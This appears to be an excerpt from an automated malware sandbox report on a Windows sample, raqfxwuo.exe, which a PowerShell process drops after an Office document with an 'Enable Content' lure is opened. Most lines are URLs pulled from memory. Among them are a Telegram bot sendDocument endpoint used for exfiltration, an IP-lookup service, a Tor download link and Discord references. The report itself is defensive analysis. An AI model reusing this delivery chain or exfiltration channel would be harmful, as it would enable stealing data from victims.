                Source: raqfxwuo.exe, 00000012.00000002.902397165.00000000062E0000.00000002.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: raqfxwuo.exe, 00000013.00000003.860850803.00000000058D5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: raqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
                Source: raqfxwuo.exe, 00000013.00000003.863994938.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/1
                Source: raqfxwuo.exe, 00000013.00000003.862193481.00000000058D5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-c
                Source: raqfxwuo.exe, 00000013.00000003.862193481.00000000058D5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/b
                Source: raqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                Source: raqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/1
                Source: raqfxwuo.exe, 00000013.00000003.860850803.00000000058D5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/k
                Source: raqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/lt
                Source: raqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/vno;
                Source: raqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/x
                Source: raqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/y
                Source: raqfxwuo.exe, 00000013.00000003.858263125.00000000058EB000.00000004.00000001.sdmpString found in binary or memory: http://www.munchfonts.co
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmp, raqfxwuo.exe, 00000013.00000003.857744123.00000000058EB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: raqfxwuo.exe, 00000013.00000003.857389194.00000000058EB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com1~
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                Source: raqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: raqfxwuo.exe, 00000012.00000002.902397165.00000000062E0000.00000002.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.aadrm.com/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.diagnostics.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                Source: raqfxwuo.exe, 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.office.net
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.onedrive.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                Source: raqfxwuo.exe, 00000012.00000002.899909340.0000000004351000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.899832989.00000000028A8000.00000004.00000001.sdmp, raqfxwuo.exe, 00000014.00000002.924181667.0000000000402000.00000040.00000001.sdmp, raqfxwuo.exe, 00000015.00000002.924149098.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
                Source: raqfxwuo.exe, 00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmp, raqfxwuo.exe, 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://augloop.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://augloop.office.com/v2
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://autodiscover-s.outlook.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://cdn.entity.
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://clients.config.office.net/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://config.edge.skype.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: powershell.exe, 0000000F.00000002.874182432.000001DF90661000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000F.00000002.874182432.000001DF90661000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000F.00000002.874182432.000001DF90661000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://cortana.ai
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://cr.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://devnull.onenote.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://directory.services.
                Source: vlc.exe.18.drString found in binary or memory: https://discord.com/
                Source: powershell.exe, 0000000E.00000002.860161665.000001FCBEC42000.00000004.00000001.sdmp, raqfxwuo.exe, 00000012.00000000.849362864.0000000000E42000.00000002.00020000.sdmp, raqfxwuo.exe, 00000013.00000000.851665329.0000000000422000.00000002.00020000.sdmp, raqfxwuo.exe, 00000014.00000002.924444029.00000000008A2000.00000002.00020000.sdmp, raqfxwuo.exe, 00000015.00000000.890163942.0000000000A92000.00000002.00020000.sdmp, vlc.exe, 00000017.00000000.903337916.0000000000B82000.00000002.00020000.sdmp, vlc.exe, 00000019.00000000.920919019.0000000000392000.00000002.00020000.sdmp, vlc.exe.18.drString found in binary or memory: https://discord.com/4
                Source: powershell.exe, 0000000E.00000002.860161665.000001FCBEC42000.00000004.00000001.sdmp, raqfxwuo.exe, 00000012.00000000.849362864.0000000000E42000.00000002.00020000.sdmp, raqfxwuo.exe, 00000013.00000000.851665329.0000000000422000.00000002.00020000.sdmp, raqfxwuo.exe, 00000014.00000002.924444029.00000000008A2000.00000002.00020000.sdmp, raqfxwuo.exe, 00000015.00000000.890163942.0000000000A92000.00000002.00020000.sdmp, vlc.exe, 00000017.00000000.903337916.0000000000B82000.00000002.00020000.sdmp, vlc.exe, 00000019.00000000.920919019.0000000000392000.00000002.00020000.sdmp, vlc.exe.18.drString found in binary or memory: https://discord.com/8
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: powershell.exe, 0000000F.00000002.860086707.000001DF80811000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: powershell.exe, 0000000E.00000002.869915692.000001FCBFB97000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 0000000F.00000003.852668699.000001DF986A3000.00000004.00000001.sdmpString found in binary or memory: https://go.microsoft.co
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://graph.ppe.windows.net
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://graph.windows.net
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://graph.windows.net/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://lifecycle.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://login.microsoftonline.com/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://login.windows.local
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://management.azure.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://management.azure.com/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://messaging.office.com/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://ncus-000.contentsync.
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                Source: powershell.exe, 0000000E.00000002.858258052.000001FCBE901000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.874182432.000001DF90661000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://officeapps.live.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://onedrive.live.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://outlook.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://outlook.office365.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://powerlift.acompli.net
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://settings.outlook.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://store.office.com/addinstemplate
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://tasks.office.com
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://wus2-000.contentsync.
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: 7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drString found in binary or memory: https://www.odwebp.svc.ms
                Source: raqfxwuo.exe, 00000012.00000002.899909340.0000000004351000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.899832989.00000000028A8000.00000004.00000001.sdmp, raqfxwuo.exe, 00000014.00000002.924181667.0000000000402000.00000040.00000001.sdmp, raqfxwuo.exe, 00000015.00000002.924149098.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: raqfxwuo.exe, 00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmp, raqfxwuo.exe, 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                Source: raqfxwuo.exe, 00000012.00000002.894191765.000000000168B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable Content : 5 6 ,- m. 8 9 10 ,,- ' " = 12 " " 13 14 - 15" :: ' ' ~ 18 19 20 I!
                Powershell drops PE fileShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\raqfxwuo.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFA37F60C70
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFA37F60DAA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFA37F61BAA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFA37F61BAA
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_014DC284
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_014DE640
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_014DE650
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_0793C398
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_0793BAC8
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_0793B780
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_07CC4F10
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_07CC4887
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_07CC4898
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_07CC4851
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_00C1C284
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_00C1E640
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_00C1E650
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_06FDC398
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_06FDBAC8
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_06FDB780
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_073A4F10
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_073A4F00
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_073A4851
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_073A4898
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_073A4887
                Source: C:\Users\Public\raqfxwuo.exeCode function: 20_2_01144800
                Source: C:\Users\Public\raqfxwuo.exeCode function: 20_2_011447F3
                Source: C:\Users\Public\raqfxwuo.exeCode function: 21_2_013B4800
